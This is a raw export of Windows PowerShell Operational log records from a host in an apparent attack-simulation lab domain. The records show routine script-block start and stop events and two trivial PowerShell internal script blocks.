EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476612
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476611
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476610
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476609
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476608
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476607
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476606
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476605
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476604
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476603
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476602
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476601
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476600
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476599
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476598
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476597
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476596
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476595
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476594
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476592
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476591
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476590
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476589
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476588
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476587
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476586
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476585
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476584
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476583
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476582
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476581
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476580
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1a5c1272-62a8-49be-b4d3-3f7366843339
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476579
Keywords=None
Message=Started invocation of ScriptBlock ID: 1a5c1272-62a8-49be-b4d3-3f7366843339
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476578
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 1a5c1272-62a8-49be-b4d3-3f7366843339
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476577
Keywords=None
Message=Completed invocation of ScriptBlock ID: b75f6ba9-20f9-44ff-8180-71c741e69686
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476576
Keywords=None
Message=Completed invocation of ScriptBlock ID: 65a845d7-c977-4a03-a4b4-59c48289733a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4af0c9ca-955b-449b-abe0-9bf444c57b7a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476574
Keywords=None
Message=Started invocation of ScriptBlock ID: 4af0c9ca-955b-449b-abe0-9bf444c57b7a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476573
Keywords=None
Message=Completed invocation of ScriptBlock ID: b0a79fe4-156f-4990-8524-d6123003a444
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476572
Keywords=None
Message=Started invocation of ScriptBlock ID: b0a79fe4-156f-4990-8524-d6123003a444
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9757e658-2a2e-4ecf-8ba9-03ef4a39c5a1
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476570
Keywords=None
Message=Completed invocation of ScriptBlock ID: 99bb2c5e-73b5-446c-a340-d5b8edfc8005
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476569
Keywords=None
Message=Completed invocation of ScriptBlock ID: f0d1c1e6-cc16-4587-92d9-c26e3a9bb298
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476568
Keywords=None
Message=Started invocation of ScriptBlock ID: f0d1c1e6-cc16-4587-92d9-c26e3a9bb298
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476567
Keywords=None
Message=Started invocation of ScriptBlock ID: 99bb2c5e-73b5-446c-a340-d5b8edfc8005
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476566
Keywords=None
Message=Started invocation of ScriptBlock ID: 9757e658-2a2e-4ecf-8ba9-03ef4a39c5a1
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476565
Keywords=None
Message=Started invocation of ScriptBlock ID: 65a845d7-c977-4a03-a4b4-59c48289733a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476564
Keywords=None
Message=Completed invocation of ScriptBlock ID: df8b432c-8d06-42d2-a4f3-2eae79ea7526
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476563
Keywords=None
Message=Started invocation of ScriptBlock ID: df8b432c-8d06-42d2-a4f3-2eae79ea7526
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476562
Keywords=None
Message=Completed invocation of ScriptBlock ID: 65a845d7-c977-4a03-a4b4-59c48289733a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476561
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4af0c9ca-955b-449b-abe0-9bf444c57b7a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476560
Keywords=None
Message=Started invocation of ScriptBlock ID: 4af0c9ca-955b-449b-abe0-9bf444c57b7a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476559
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 4af0c9ca-955b-449b-abe0-9bf444c57b7a
Path:
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476558
Keywords=None
Message=Completed invocation of ScriptBlock ID: b0a79fe4-156f-4990-8524-d6123003a444
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
